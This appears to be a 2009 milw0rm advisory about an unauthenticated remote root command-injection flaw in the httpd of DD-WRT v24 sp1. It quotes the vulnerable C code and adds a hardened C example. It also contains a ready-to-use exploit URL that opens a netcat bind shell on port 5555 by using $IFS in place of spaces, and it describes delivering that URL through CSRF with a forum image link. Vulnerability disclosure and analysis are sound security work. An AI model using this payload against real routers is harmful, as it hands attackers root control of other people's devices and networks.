This is a remote root vulnerability in DD-WRT's httpd server. The bug exists
in the latest version of the firmware, 24 sp1.

The problem is due to many bugs and bad software design decisions. Here is
part of httpd.c:

    if (containsstring(file, "cgi-bin")) {

        auth_fail = 0;
        if (!do_auth
            (conn_fp, auth_userid, auth_passwd, auth_realm,
             authorization, auth_check))
            auth_fail = 1;   /* result is only recorded here; nothing below checks it before executing */

......... (snip)............

        }
        exec = fopen("/tmp/exec.tmp", "wb");
        fprintf(exec, "export REQUEST_METHOD=\"%s\"\n", method);
        if (query)
            fprintf(exec, "/bin/sh %s/%s</tmp/exec.query\n",
                    server_dir != NULL ? server_dir : "/www", file);   /* 'file' is the raw request path */
        else
            fprintf(exec, "/%s/%s\n",
                    server_dir != NULL ? server_dir : "/www",
                    file);
        fclose(exec);

        if (query) {
            exec = fopen("/tmp/exec.query", "wb");
            fprintf(exec, "%s\n", query);

........................

Two issues there:

1) No metacharacter handling.
2) Command gets executed even without successful authentication.
   You are not going to see any output if not authenticated though.

.......................

            free(query);
            fclose(exec);
        }

        system2("chmod 700 /tmp/exec.tmp");
        system2("/tmp/exec.tmp>/tmp/shellout.asp");   /* the script built above runs here, before auth_fail is looked at */

........... (snip)..........

        if (auth_fail == 1) {
            send_authenticate(auth_realm);
            auth_fail = 0;

------------

3) Issue 3: httpd runs as root :)
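As an added example (not the advisory's code and not DD-WRT's), here is the same flow in C with the two defects fixed: the do_auth result gates execution instead of only the response, and the CGI script name is checked against a whitelist before it is spliced into the shell script. cgi_name_is_safe and handle_cgi are hypothetical names; the authenticated flag stands in for the do_auth result.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical whitelist: a CGI script name may contain only
 * [A-Za-z0-9._-], must not be empty or over-long, and must not
 * contain "..". Shell metacharacters such as ';' and '$' (the ones
 * the advisory's URLs rely on) and '/' are therefore rejected. */
bool cgi_name_is_safe(const char *name)
{
    size_t len = strlen(name);
    if (len == 0 || len > 64)
        return false;
    if (strstr(name, "..") != NULL)
        return false;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-'))
            return false;
    }
    return true;
}

/* Hardened handler. 'authenticated' stands in for the result of
 * do_auth(). Returns 0 and writes the command line into 'cmd' on
 * success, -1 if authentication failed (nothing is executed), -2 if
 * the request path is not a whitelisted CGI script. Note the order:
 * the auth check happens before any command text is built. */
int handle_cgi(bool authenticated, const char *path,
               char *cmd, size_t cmdlen)
{
    static const char prefix[] = "cgi-bin/";
    size_t plen = sizeof prefix - 1;

    if (!authenticated)
        return -1;
    if (strncmp(path, prefix, plen) != 0)
        return -2;
    if (!cgi_name_is_safe(path + plen))
        return -2;
    /* Only a whitelisted name ever reaches the shell script. */
    snprintf(cmd, cmdlen, "/www/cgi-bin/%s", path + plen);
    return 0;
}
```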

Now let's sum up (1), (2) and (3). Any unauthenticated attacker that can
connect to the management web interface can easily get root on the device via
his browser with a URL like:

http://routerIP/cgi-bin/;command_to_execute

There is a catch though: whitespaces break it. Anyway, they can be easily
replaced with a shell variable like $IFS. So, getting a root shell at 5555/tcp
becomes as easy as typing this in your browser's URL bar:

http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh

|
Voila (pretty old-school, eheh). Here is some (poor) video demonstrating the
problem:

http://www.youtube.com/watch?v=UhDcXCVFrvM

Fortunately, httpd by default does not listen on the outbound interface.
However, this vulnerability can be exploited via a CSRF attack (the dd-wrt
device's owner does not even need to have an authenticated session on the web
UI, which is bad, bad). However, a basic authentication dialog will appear. In
IE even this can be suppressed, see this one:

http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/

Unlike the already documented CSRF vulnerability (
https://www.securityfocus.com/bid/32703 ) this DOES NOT need an authenticated
session. This means someone can even post some crafted [img] link on a forum
and a dd-wrt router owner visiting the forum will get owned :)

A weird vulnerability you're unlikely to see in 2009 :) Quite embarrassing, I
would say :)

Thanks krassyo at krassyo.info for his support :)

Good evening :)

# milw0rm.com [2009-07-20]